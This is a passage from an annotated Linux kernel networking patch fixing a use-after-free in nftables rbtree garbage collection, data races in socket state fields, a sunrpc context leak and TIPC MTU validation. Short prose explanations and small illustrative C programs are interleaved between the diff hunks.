+ 	/* search for expired end interval coming before this element. */
+-	do {
++	while (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+ 		if (nft_rbtree_interval_end(rbe_prev))
+ 			break;
+ 
+ 		prev = rb_prev(prev);
+-	} while (prev != NULL);
++	}
++
++	if (rbe_prev) {
++		rb_erase(&rbe_prev->node, &priv->root);
++		atomic_dec(&set->nelems);
++	}
+ 
+-	rb_erase(&rbe_prev->node, &priv->root);
+ 	rb_erase(&rbe->node, &priv->root);
+-	atomic_sub(2, &set->nelems);
++	atomic_dec(&set->nelems);
+ 
+ 	nft_set_gc_batch_add(gcb, rbe);
+ 	nft_set_gc_batch_complete(gcb);
+@@ -268,7 +272,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 			       struct nft_set_ext **ext)
+ {
+ 	struct nft_rbtree_elem *rbe, *rbe_le = NULL, *rbe_ge = NULL;
+-	struct rb_node *node, *parent, **p, *first = NULL;
++	struct rb_node *node, *next, *parent, **p, *first = NULL;
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 genmask = nft_genmask_next(net);
+ 	int d, err;
+@@ -307,7 +311,9 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	 * Values stored in the tree are in reversed order, starting from
+ 	 * highest to lowest value.
+ 	 */
+-	for (node = first; node != NULL; node = rb_next(node)) {
++	for (node = first; node != NULL; node = next) {
++		next = rb_next(node);
++
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
+ 		if (!nft_set_elem_active(&rbe->ext, genmask))
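
The rbtree GC fix addresses two hazards: the backward search may find no expired end interval at all, so rbe_prev starts out NULL and is only erased (with a matching single nelems decrement) when actually found; and the insert path now caches rb_next(node) before the loop body can erase node, since following pointers out of a removed node is a use-after-free. The save-next-before-erase idiom, shown on a plain singly linked list rather than an rbtree:

#include <stdio.h>
#include <stdlib.h>

struct node { int val; struct node *next; };

static void erase_matching(struct node **head, int val)
{
	struct node **link = head, *n, *next;

	for (n = *head; n; n = next) {
		next = n->next;		/* cache before n can be freed */
		if (n->val == val) {
			*link = next;
			free(n);	/* n is gone; 'next' is still valid */
			continue;
		}
		link = &n->next;
	}
}

int main(void)
{
	struct node *head = NULL;

	for (int i = 0; i < 5; i++) {
		struct node *n = malloc(sizeof(*n));
		n->val = i % 2;
		n->next = head;
		head = n;
	}
	erase_matching(&head, 1);
	for (struct node *n = head; n; n = n->next)
		printf("%d ", n->val);
	printf("\n");
	return 0;
}
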
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index b1dcc536521b6..d1b19618890b7 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1979,7 +1979,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	skb_free_datagram(sk, skb);
+ 
+-	if (nlk->cb_running &&
++	if (READ_ONCE(nlk->cb_running) &&
+ 	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf / 2) {
+ 		ret = netlink_dump(sk);
+ 		if (ret) {
+@@ -2293,7 +2293,7 @@ static int netlink_dump(struct sock *sk)
+ 	if (cb->done)
+ 		cb->done(cb);
+ 
+-	nlk->cb_running = false;
++	WRITE_ONCE(nlk->cb_running, false);
+ 	module = cb->module;
+ 	skb = cb->skb;
+ 	mutex_unlock(nlk->cb_mutex);
+@@ -2356,7 +2356,7 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 			goto error_put;
+ 	}
+ 
+-	nlk->cb_running = true;
++	WRITE_ONCE(nlk->cb_running, true);
+ 	nlk->dump_done_errno = INT_MAX;
+ 
+ 	mutex_unlock(nlk->cb_mutex);
+@@ -2681,7 +2681,7 @@ static int netlink_native_seq_show(struct seq_file *seq, void *v)
+ 			   nlk->groups ? (u32)nlk->groups[0] : 0,
+ 			   sk_rmem_alloc_get(s),
+ 			   sk_wmem_alloc_get(s),
+-			   nlk->cb_running,
++			   READ_ONCE(nlk->cb_running),
+ 			   refcount_read(&s->sk_refcnt),
+ 			   atomic_read(&s->sk_drops),
+ 			   sock_i_ino(s)
+diff --git a/net/nsh/nsh.c b/net/nsh/nsh.c
+index e9ca007718b7e..0f23e5e8e03eb 100644
+--- a/net/nsh/nsh.c
++++ b/net/nsh/nsh.c
+@@ -77,13 +77,12 @@ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 				       netdev_features_t features)
+ {
+ 	struct sk_buff *segs = ERR_PTR(-EINVAL);
++	u16 mac_offset = skb->mac_header;
+ 	unsigned int nsh_len, mac_len;
+ 	__be16 proto;
+-	int nhoff;
+ 
+ 	skb_reset_network_header(skb);
+ 
+-	nhoff = skb->network_header - skb->mac_header;
+ 	mac_len = skb->mac_len;
+ 
+ 	if (unlikely(!pskb_may_pull(skb, NSH_BASE_HDR_LEN)))
+@@ -108,15 +107,14 @@ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 	segs = skb_mac_gso_segment(skb, features);
+ 	if (IS_ERR_OR_NULL(segs)) {
+ 		skb_gso_error_unwind(skb, htons(ETH_P_NSH), nsh_len,
+-				     skb->network_header - nhoff,
+-				     mac_len);
++				     mac_offset, mac_len);
+ 		goto out;
+ 	}
+ 
+ 	for (skb = segs; skb; skb = skb->next) {
+ 		skb->protocol = htons(ETH_P_NSH);
+ 		__skb_push(skb, nsh_len);
+-		skb_set_mac_header(skb, -nhoff);
++		skb->mac_header = mac_offset;
+ 		skb->network_header = skb->mac_header + mac_len;
+ 		skb->mac_len = mac_len;
+ 	}
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 2af2ab924d64a..67771b0f57719 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -1936,10 +1936,8 @@ static void packet_parse_headers(struct sk_buff *skb, struct socket *sock)
+ 	/* Move network header to the right position for VLAN tagged packets */
+ 	if (likely(skb->dev->type == ARPHRD_ETHER) &&
+ 	    eth_type_vlan(skb->protocol) &&
+-	    __vlan_get_protocol(skb, skb->protocol, &depth) != 0) {
+-		if (pskb_may_pull(skb, depth))
+-			skb_set_network_header(skb, depth);
+-	}
++	    vlan_get_protocol_and_depth(skb, skb->protocol, &depth) != 0)
++		skb_set_network_header(skb, depth);
+ 
+ 	skb_probe_transport_header(skb);
+ }
+diff --git a/net/smc/smc_close.c b/net/smc/smc_close.c
+index 31db7438857c9..dbdf03e8aa5b5 100644
+--- a/net/smc/smc_close.c
++++ b/net/smc/smc_close.c
+@@ -67,8 +67,8 @@ static void smc_close_stream_wait(struct smc_sock *smc, long timeout)
+ 
+ 		rc = sk_wait_event(sk, &timeout,
+ 				   !smc_tx_prepared_sends(&smc->conn) ||
+-				   sk->sk_err == ECONNABORTED ||
+-				   sk->sk_err == ECONNRESET ||
++				   READ_ONCE(sk->sk_err) == ECONNABORTED ||
++				   READ_ONCE(sk->sk_err) == ECONNRESET ||
+ 				   smc->conn.killed,
+ 				   &wait);
+ 		if (rc)
+diff --git a/net/smc/smc_rx.c b/net/smc/smc_rx.c
+index 17c5aee7ee4f2..ffcc9996a3da3 100644
+--- a/net/smc/smc_rx.c
++++ b/net/smc/smc_rx.c
+@@ -263,9 +263,9 @@ int smc_rx_wait(struct smc_sock *smc, long *timeo,
+ 	sk_set_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	rc = sk_wait_event(sk, timeo,
+-			   sk->sk_err ||
++			   READ_ONCE(sk->sk_err) ||
+ 			   cflags->peer_conn_abort ||
+-			   sk->sk_shutdown & RCV_SHUTDOWN ||
++			   READ_ONCE(sk->sk_shutdown) & RCV_SHUTDOWN ||
+ 			   conn->killed ||
+ 			   fcrit(conn),
+ 			   &wait);
+diff --git a/net/smc/smc_tx.c b/net/smc/smc_tx.c
+index f4b6a71ac488a..45128443f1f10 100644
+--- a/net/smc/smc_tx.c
++++ b/net/smc/smc_tx.c
+@@ -113,8 +113,8 @@ static int smc_tx_wait(struct smc_sock *smc, int flags)
+ 			break; /* at least 1 byte of free & no urgent data */
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk_wait_event(sk, &timeo,
+-			      sk->sk_err ||
+-			      (sk->sk_shutdown & SEND_SHUTDOWN) ||
++			      READ_ONCE(sk->sk_err) ||
++			      (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
+ 			      smc_cdc_rxed_any_close(conn) ||
+ 			      (atomic_read(&conn->sndbuf_space) &&
+ 			       !conn->urg_tx_pend),
+diff --git a/net/socket.c b/net/socket.c
+index 577079a8935fa..c2e0a22f16d9b 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -2890,7 +2890,7 @@ static int do_recvmmsg(int fd, struct mmsghdr __user *mmsg,
+ 		 * error to return on the next call or if the
+ 		 * app asks about it using getsockopt(SO_ERROR).
+ 		 */
+-		sock->sk->sk_err = -err;
++		WRITE_ONCE(sock->sk->sk_err, -err);
+ 	}
+ out_put:
+ 	fput_light(sock->file, fput_needed);
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 9ee32e06f877e..9b0b21cccca9a 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -1007,7 +1007,7 @@ static int __svc_register(struct net *net, const char *progname,
+ #endif
+ 	}
+ 
+-	trace_svc_register(progname, version, protocol, port, family, error);
++	trace_svc_register(progname, version, family, protocol, port, error);
+ 	return error;
+ }
+ 
+diff --git a/net/sunrpc/svc_xprt.c b/net/sunrpc/svc_xprt.c
+index c2ce125380080..8117d0e08d5a2 100644
+--- a/net/sunrpc/svc_xprt.c
++++ b/net/sunrpc/svc_xprt.c
+@@ -534,13 +534,23 @@ void svc_reserve(struct svc_rqst *rqstp, int space)
+ }
+ EXPORT_SYMBOL_GPL(svc_reserve);
+ 
++static void free_deferred(struct svc_xprt *xprt, struct svc_deferred_req *dr)
++{
++	if (!dr)
++		return;
++
++	xprt->xpt_ops->xpo_release_ctxt(xprt, dr->xprt_ctxt);
++	kfree(dr);
++}
++
+ static void svc_xprt_release(struct svc_rqst *rqstp)
+ {
+ 	struct svc_xprt	*xprt = rqstp->rq_xprt;
+ 
+-	xprt->xpt_ops->xpo_release_rqst(rqstp);
++	xprt->xpt_ops->xpo_release_ctxt(xprt, rqstp->rq_xprt_ctxt);
++	rqstp->rq_xprt_ctxt = NULL;
+ 
+-	kfree(rqstp->rq_deferred);
++	free_deferred(xprt, rqstp->rq_deferred);
+ 	rqstp->rq_deferred = NULL;
+ 
+ 	pagevec_release(&rqstp->rq_pvec);
+@@ -1059,7 +1069,7 @@ static void svc_delete_xprt(struct svc_xprt *xprt)
+ 	spin_unlock_bh(&serv->sv_lock);
+ 
+ 	while ((dr = svc_deferred_dequeue(xprt)) != NULL)
+-		kfree(dr);
++		free_deferred(xprt, dr);
+ 
+ 	call_xpt_users(xprt);
+ 	svc_xprt_put(xprt);
+@@ -1181,8 +1191,8 @@ static void svc_revisit(struct cache_deferred_req *dreq, int too_many)
+ 	if (too_many || test_bit(XPT_DEAD, &xprt->xpt_flags)) {
+ 		spin_unlock(&xprt->xpt_lock);
+ 		trace_svc_defer_drop(dr);
++		free_deferred(xprt, dr);
+ 		svc_xprt_put(xprt);
+-		kfree(dr);
+ 		return;
+ 	}
+ 	dr->xprt = NULL;
+@@ -1227,14 +1237,14 @@ static struct cache_deferred_req *svc_defer(struct cache_req *req)
+ 		dr->addrlen = rqstp->rq_addrlen;
+ 		dr->daddr = rqstp->rq_daddr;
+ 		dr->argslen = rqstp->rq_arg.len >> 2;
+-		dr->xprt_ctxt = rqstp->rq_xprt_ctxt;
+-		rqstp->rq_xprt_ctxt = NULL;
+ 
+ 		/* back up head to the start of the buffer and copy */
+ 		skip = rqstp->rq_arg.len - rqstp->rq_arg.head[0].iov_len;
+ 		memcpy(dr->args, rqstp->rq_arg.head[0].iov_base - skip,
+ 		       dr->argslen << 2);
+ 	}
++	dr->xprt_ctxt = rqstp->rq_xprt_ctxt;
++	rqstp->rq_xprt_ctxt = NULL;
+ 	trace_svc_defer(rqstp);
+ 	svc_xprt_get(rqstp->rq_xprt);
+ 	dr->xprt = rqstp->rq_xprt;
+@@ -1267,6 +1277,8 @@ static noinline int svc_deferred_recv(struct svc_rqst *rqstp)
+ 	rqstp->rq_daddr       = dr->daddr;
+ 	rqstp->rq_respages    = rqstp->rq_pages;
+ 	rqstp->rq_xprt_ctxt   = dr->xprt_ctxt;
++
++	dr->xprt_ctxt = NULL;
+ 	svc_xprt_received(rqstp->rq_xprt);
+ 	return dr->argslen << 2;
+ }
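
The sunrpc changes above funnel every disposal of a deferred request through one free_deferred() helper, so the transport context the request carries is released on all paths (normal release, revisit-drop, transport deletion) instead of leaking through a bare kfree(); the svcsock and rdma hunks that follow rename the per-transport hook to xpo_release_ctxt(xprt, ctxt) to match. The single owner-aware destructor shape, as a sketch with illustrative names:

#include <stdio.h>
#include <stdlib.h>

struct deferred_req {
	void *xprt_ctxt;	/* transport-owned resource carried along */
	/* ... saved request data ... */
};

static void release_ctxt(void *ctxt)
{
	if (ctxt)
		printf("releasing transport ctxt %p\n", ctxt);
	free(ctxt);
}

/* Every code path that drops a deferred request calls this and
 * nothing else, so the carried context can never leak. */
static void free_deferred(struct deferred_req *dr)
{
	if (!dr)
		return;
	release_ctxt(dr->xprt_ctxt);
	free(dr);
}

int main(void)
{
	struct deferred_req *dr = malloc(sizeof(*dr));

	dr->xprt_ctxt = malloc(32);
	free_deferred(dr);	/* instead of a bare free(dr) */
	return 0;
}
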
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index 815baf308236a..7107fbcbff343 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -111,27 +111,27 @@ static void svc_reclassify_socket(struct socket *sock)
+ #endif
+ 
+ /**
+- * svc_tcp_release_rqst - Release transport-related resources
+- * @rqstp: request structure with resources to be released
++ * svc_tcp_release_ctxt - Release transport-related resources
++ * @xprt: the transport which owned the context
++ * @ctxt: the context from rqstp->rq_xprt_ctxt or dr->xprt_ctxt
+  *
+  */
+-static void svc_tcp_release_rqst(struct svc_rqst *rqstp)
++static void svc_tcp_release_ctxt(struct svc_xprt *xprt, void *ctxt)
+ {
+ }
+ 
+ /**
+- * svc_udp_release_rqst - Release transport-related resources
+- * @rqstp: request structure with resources to be released
++ * svc_udp_release_ctxt - Release transport-related resources
++ * @xprt: the transport which owned the context
++ * @ctxt: the context from rqstp->rq_xprt_ctxt or dr->xprt_ctxt
+  *
+  */
+-static void svc_udp_release_rqst(struct svc_rqst *rqstp)
++static void svc_udp_release_ctxt(struct svc_xprt *xprt, void *ctxt)
+ {
+-	struct sk_buff *skb = rqstp->rq_xprt_ctxt;
++	struct sk_buff *skb = ctxt;
+ 
+-	if (skb) {
+-		rqstp->rq_xprt_ctxt = NULL;
++	if (skb)
+ 		consume_skb(skb);
+-	}
+ }
+ 
+ union svc_pktinfo_u {
+@@ -559,7 +559,8 @@ static int svc_udp_sendto(struct svc_rqst *rqstp)
+ 	unsigned int sent;
+ 	int err;
+ 
+-	svc_udp_release_rqst(rqstp);
++	svc_udp_release_ctxt(xprt, rqstp->rq_xprt_ctxt);
++	rqstp->rq_xprt_ctxt = NULL;
+ 
+ 	svc_set_cmsg_data(rqstp, cmh);
+ 
+@@ -631,7 +632,7 @@ static const struct svc_xprt_ops svc_udp_ops = {
+ 	.xpo_recvfrom = svc_udp_recvfrom,
+ 	.xpo_sendto = svc_udp_sendto,
+ 	.xpo_result_payload = svc_sock_result_payload,
+-	.xpo_release_rqst = svc_udp_release_rqst,
++	.xpo_release_ctxt = svc_udp_release_ctxt,
+ 	.xpo_detach = svc_sock_detach,
+ 	.xpo_free = svc_sock_free,
+ 	.xpo_has_wspace = svc_udp_has_wspace,
+@@ -1159,7 +1160,8 @@ static int svc_tcp_sendto(struct svc_rqst *rqstp)
+ 	unsigned int sent;
+ 	int err;
+ 
+-	svc_tcp_release_rqst(rqstp);
++	svc_tcp_release_ctxt(xprt, rqstp->rq_xprt_ctxt);
++	rqstp->rq_xprt_ctxt = NULL;
+ 
+ 	atomic_inc(&svsk->sk_sendqlen);
+ 	mutex_lock(&xprt->xpt_mutex);
+@@ -1204,7 +1206,7 @@ static const struct svc_xprt_ops svc_tcp_ops = {
+ 	.xpo_recvfrom = svc_tcp_recvfrom,
+ 	.xpo_sendto = svc_tcp_sendto,
+ 	.xpo_result_payload = svc_sock_result_payload,
+-	.xpo_release_rqst = svc_tcp_release_rqst,
++	.xpo_release_ctxt = svc_tcp_release_ctxt,
+ 	.xpo_detach = svc_tcp_sock_detach,
+ 	.xpo_free = svc_sock_free,
+ 	.xpo_has_wspace = svc_tcp_has_wspace,
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+index 5242ad121450b..53a7cb2f6c07d 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+@@ -239,21 +239,20 @@ void svc_rdma_recv_ctxt_put(struct svcxprt_rdma *rdma,
+ }
+ 
+ /**
+- * svc_rdma_release_rqst - Release transport-specific per-rqst resources
+- * @rqstp: svc_rqst being released
++ * svc_rdma_release_ctxt - Release transport-specific per-rqst resources
++ * @xprt: the transport which owned the context
++ * @vctxt: the context from rqstp->rq_xprt_ctxt or dr->xprt_ctxt
+  *
+  * Ensure that the recv_ctxt is released whether or not a Reply
+  * was sent. For example, the client could close the connection,
+  * or svc_process could drop an RPC, before the Reply is sent.
+  */
+-void svc_rdma_release_rqst(struct svc_rqst *rqstp)
++void svc_rdma_release_ctxt(struct svc_xprt *xprt, void *vctxt)
+ {
+-	struct svc_rdma_recv_ctxt *ctxt = rqstp->rq_xprt_ctxt;
+-	struct svc_xprt *xprt = rqstp->rq_xprt;
++	struct svc_rdma_recv_ctxt *ctxt = vctxt;
+ 	struct svcxprt_rdma *rdma =
+ 		container_of(xprt, struct svcxprt_rdma, sc_xprt);
+ 
+-	rqstp->rq_xprt_ctxt = NULL;
+ 	if (ctxt)
+ 		svc_rdma_recv_ctxt_put(rdma, ctxt);
+ }
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_transport.c b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+index 94b20fb471356..f776f0cb471f0 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_transport.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+@@ -81,7 +81,7 @@ static const struct svc_xprt_ops svc_rdma_ops = {
+ 	.xpo_recvfrom = svc_rdma_recvfrom,
+ 	.xpo_sendto = svc_rdma_sendto,
+ 	.xpo_result_payload = svc_rdma_result_payload,
+-	.xpo_release_rqst = svc_rdma_release_rqst,
++	.xpo_release_ctxt = svc_rdma_release_ctxt,
+ 	.xpo_detach = svc_rdma_detach,
+ 	.xpo_free = svc_rdma_free,
+ 	.xpo_has_wspace = svc_rdma_has_wspace,
+diff --git a/net/tipc/bearer.c b/net/tipc/bearer.c
+index 35cac7733fd3a..53881406e2006 100644
+--- a/net/tipc/bearer.c
++++ b/net/tipc/bearer.c
+@@ -541,6 +541,19 @@ int tipc_bearer_mtu(struct net *net, u32 bearer_id)
+ 	return mtu;
+ }
+ 
++int tipc_bearer_min_mtu(struct net *net, u32 bearer_id)
++{
++	int mtu = TIPC_MIN_BEARER_MTU;
++	struct tipc_bearer *b;
++
++	rcu_read_lock();
++	b = bearer_get(net, bearer_id);
++	if (b)
++		mtu += b->encap_hlen;
++	rcu_read_unlock();
++	return mtu;
++}
++
+ /* tipc_bearer_xmit_skb - sends buffer to destination over bearer
+  */
+ void tipc_bearer_xmit_skb(struct net *net, u32 bearer_id,
+@@ -1138,8 +1151,8 @@ int __tipc_nl_bearer_set(struct sk_buff *skb, struct genl_info *info)
+ 				return -EINVAL;
+ 			}
+ #ifdef CONFIG_TIPC_MEDIA_UDP
+-			if (tipc_udp_mtu_bad(nla_get_u32
+-					     (props[TIPC_NLA_PROP_MTU]))) {
++			if (nla_get_u32(props[TIPC_NLA_PROP_MTU]) <
++			    b->encap_hlen + TIPC_MIN_BEARER_MTU) {
+ 				NL_SET_ERR_MSG(info->extack,
+ 					       "MTU value is out-of-range");
+ 				return -EINVAL;
+diff --git a/net/tipc/bearer.h b/net/tipc/bearer.h
+index 490ad6e5f7a3c..bd0cc5c287ef8 100644
+--- a/net/tipc/bearer.h
++++ b/net/tipc/bearer.h
+@@ -146,6 +146,7 @@ struct tipc_media {
+  * @identity: array index of this bearer within TIPC bearer array
+  * @disc: ptr to link setup request
+  * @net_plane: network plane ('A' through 'H') currently associated with bearer
++ * @encap_hlen: encap headers length
+  * @up: bearer up flag (bit 0)
+  * @refcnt: tipc_bearer reference counter
+  *
+@@ -170,6 +171,7 @@ struct tipc_bearer {
+ 	u32 identity;
+ 	struct tipc_discoverer *disc;
+ 	char net_plane;
++	u16 encap_hlen;
+ 	unsigned long up;
+ 	refcount_t refcnt;
+ };
+@@ -232,6 +234,7 @@ int tipc_bearer_setup(void);
+ void tipc_bearer_cleanup(void);
+ void tipc_bearer_stop(struct net *net);
+ int tipc_bearer_mtu(struct net *net, u32 bearer_id);
++int tipc_bearer_min_mtu(struct net *net, u32 bearer_id);
+ bool tipc_bearer_bcast_support(struct net *net, u32 bearer_id);
+ void tipc_bearer_xmit_skb(struct net *net, u32 bearer_id,
+ 			  struct sk_buff *skb,
+diff --git a/net/tipc/link.c b/net/tipc/link.c
+index b3ce24823f503..2eff1c7949cbc 100644
+--- a/net/tipc/link.c
++++ b/net/tipc/link.c
+@@ -2200,7 +2200,7 @@ static int tipc_link_proto_rcv(struct tipc_link *l, struct sk_buff *skb,
+ 	struct tipc_msg *hdr = buf_msg(skb);
+ 	struct tipc_gap_ack_blks *ga = NULL;
+ 	bool reply = msg_probe(hdr), retransmitted = false;
+-	u32 dlen = msg_data_sz(hdr), glen = 0;
++	u32 dlen = msg_data_sz(hdr), glen = 0, msg_max;
+ 	u16 peers_snd_nxt =  msg_next_sent(hdr);
+ 	u16 peers_tol = msg_link_tolerance(hdr);
+ 	u16 peers_prio = msg_linkprio(hdr);
+@@ -2239,6 +2239,9 @@ static int tipc_link_proto_rcv(struct tipc_link *l, struct sk_buff *skb,
+ 	switch (mtyp) {
+ 	case RESET_MSG:
+ 	case ACTIVATE_MSG:
++		msg_max = msg_max_pkt(hdr);
++		if (msg_max < tipc_bearer_min_mtu(l->net, l->bearer_id))
++			break;
+ 		/* Complete own link name with peer's interface name */
+ 		if_name =  strrchr(l->name, ':') + 1;
+ 		if (sizeof(l->name) - (if_name - l->name) <= TIPC_MAX_IF_NAME)
+@@ -2283,8 +2286,8 @@ static int tipc_link_proto_rcv(struct tipc_link *l, struct sk_buff *skb,
+ 		l->peer_session = msg_session(hdr);
+ 		l->in_session = true;
+ 		l->peer_bearer_id = msg_bearer_id(hdr);
+-		if (l->mtu > msg_max_pkt(hdr))
+-			l->mtu = msg_max_pkt(hdr);
++		if (l->mtu > msg_max)
++			l->mtu = msg_max;
+ 		break;
+ 
+ 	case STATE_MSG:
+diff --git a/net/tipc/socket.c b/net/tipc/socket.c
+index ff5bb9e4731c4..14027a7a7bef8 100644
+--- a/net/tipc/socket.c
++++ b/net/tipc/socket.c
+@@ -313,9 +313,9 @@ static void tsk_rej_rx_queue(struct sock *sk, int error)
+ 		tipc_sk_respond(sk, skb, error);
+ }
+ 
+-static bool tipc_sk_connected(struct sock *sk)
++static bool tipc_sk_connected(const struct sock *sk)
+ {
+-	return sk->sk_state == TIPC_ESTABLISHED;
++	return READ_ONCE(sk->sk_state) == TIPC_ESTABLISHED;
+ }
+ 
+ /* tipc_sk_type_connectionless - check if the socket is datagram socket
+diff --git a/net/tipc/udp_media.c b/net/tipc/udp_media.c
+index c2bb818704c8f..0a85244fd6188 100644
+--- a/net/tipc/udp_media.c
++++ b/net/tipc/udp_media.c
+@@ -738,8 +738,8 @@ static int tipc_udp_enable(struct net *net, struct tipc_bearer *b,
+ 			udp_conf.local_ip.s_addr = local.ipv4.s_addr;
+ 		udp_conf.use_udp_checksums = false;
+ 		ub->ifindex = dev->ifindex;
+-		if (tipc_mtu_bad(dev, sizeof(struct iphdr) +
+-				      sizeof(struct udphdr))) {
++		b->encap_hlen = sizeof(struct iphdr) + sizeof(struct udphdr);
++		if (tipc_mtu_bad(dev, b->encap_hlen)) {
+ 			err = -EINVAL;
+ 			goto err;
+ 		}
+@@ -760,6 +760,7 @@ static int tipc_udp_enable(struct net *net, struct tipc_bearer *b,
+ 		else
+ 			udp_conf.local_ip6 = local.ipv6;
+ 		ub->ifindex = dev->ifindex;
++		b->encap_hlen = sizeof(struct ipv6hdr) + sizeof(struct udphdr);
+ 		b->mtu = 1280;
+ #endif
+ 	} else {
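
The TIPC changes record the UDP encapsulation overhead in b->encap_hlen (20+8 bytes for IPv4, 40+8 for IPv6) and define the effective minimum bearer MTU as TIPC_MIN_BEARER_MTU plus that overhead; both the netlink MTU setter and incoming RESET/ACTIVATE link messages are checked against it, so a peer cannot negotiate a link below a usable packet size. The arithmetic, with an illustrative floor value standing in for the real TIPC_MIN_BEARER_MTU:

#include <stdio.h>

#define TIPC_MIN_BEARER_MTU 64	/* illustrative floor; see the tipc headers */

struct bearer { unsigned short encap_hlen; };

static int bearer_min_mtu(const struct bearer *b)
{
	return TIPC_MIN_BEARER_MTU + b->encap_hlen;
}

int main(void)
{
	struct bearer v4 = { .encap_hlen = 20 + 8 };	/* iphdr + udphdr */
	struct bearer v6 = { .encap_hlen = 40 + 8 };	/* ipv6hdr + udphdr */

	printf("ipv4 min mtu: %d\n", bearer_min_mtu(&v4));
	printf("ipv6 min mtu: %d\n", bearer_min_mtu(&v6));

	/* a proposed MTU below this must be rejected */
	int proposed = 60;
	printf("proposed %d ok: %s\n", proposed,
	       proposed >= bearer_min_mtu(&v4) ? "yes" : "no");
	return 0;
}
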
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index b32c112984dd9..f2e7302a4d96b 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -111,7 +111,8 @@ int wait_on_pending_writer(struct sock *sk, long *timeo)
+ 			break;
+ 		}
+ 
+-		if (sk_wait_event(sk, timeo, !sk->sk_write_pending, &wait))
++		if (sk_wait_event(sk, timeo,
++				  !READ_ONCE(sk->sk_write_pending), &wait))
+ 			break;
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 7d17601ceee79..70eb3bc67126d 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -602,7 +602,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 	/* Clear state */
+ 	unix_state_lock(sk);
+ 	sock_orphan(sk);
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 	path	     = u->path;
+ 	u->path.dentry = NULL;
+ 	u->path.mnt = NULL;
+@@ -627,7 +627,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 		if (sk->sk_type == SOCK_STREAM || sk->sk_type == SOCK_SEQPACKET) {
+ 			unix_state_lock(skpair);
+ 			/* No more writes */
+-			skpair->sk_shutdown = SHUTDOWN_MASK;
++			WRITE_ONCE(skpair->sk_shutdown, SHUTDOWN_MASK);
+ 			if (!skb_queue_empty(&sk->sk_receive_queue) || embrion)
+ 				skpair->sk_err = ECONNRESET;
+ 			unix_state_unlock(skpair);
+@@ -1441,7 +1441,7 @@ static long unix_wait_for_peer(struct sock *other, long timeo)
+ 
+ 	sched = !sock_flag(other, SOCK_DEAD) &&
+ 		!(other->sk_shutdown & RCV_SHUTDOWN) &&
+-		unix_recvq_full(other);
++		unix_recvq_full_lockless(other);
+ 
+ 	unix_state_unlock(other);
+ 
+@@ -3007,7 +3007,7 @@ static int unix_shutdown(struct socket *sock, int mode)
+ 	++mode;
+ 
+ 	unix_state_lock(sk);
+-	sk->sk_shutdown |= mode;
++	WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | mode);
+ 	other = unix_peer(sk);
+ 	if (other)
+ 		sock_hold(other);
+@@ -3027,7 +3027,7 @@ static int unix_shutdown(struct socket *sock, int mode)
+ 		if (mode&SEND_SHUTDOWN)
+ 			peer_mode |= RCV_SHUTDOWN;
+ 		unix_state_lock(other);
+-		other->sk_shutdown |= peer_mode;
++		WRITE_ONCE(other->sk_shutdown, other->sk_shutdown | peer_mode);
+ 		unix_state_unlock(other);
+ 		other->sk_state_change(other);
+ 		if (peer_mode == SHUTDOWN_MASK)
+@@ -3159,16 +3159,18 @@ static __poll_t unix_poll(struct file *file, struct socket *sock, poll_table *wa
+ {
+ 	struct sock *sk = sock->sk;
+ 	__poll_t mask;
++	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
++	shutdown = READ_ONCE(sk->sk_shutdown);
+ 
+ 	/* exceptional events? */
+ 	if (sk->sk_err)
+ 		mask |= EPOLLERR;
+-	if (sk->sk_shutdown == SHUTDOWN_MASK)
++	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLRDHUP | EPOLLIN | EPOLLRDNORM;
+ 
+ 	/* readable? */
+@@ -3202,18 +3204,20 @@ static __poll_t unix_dgram_poll(struct file *file, struct socket *sock,
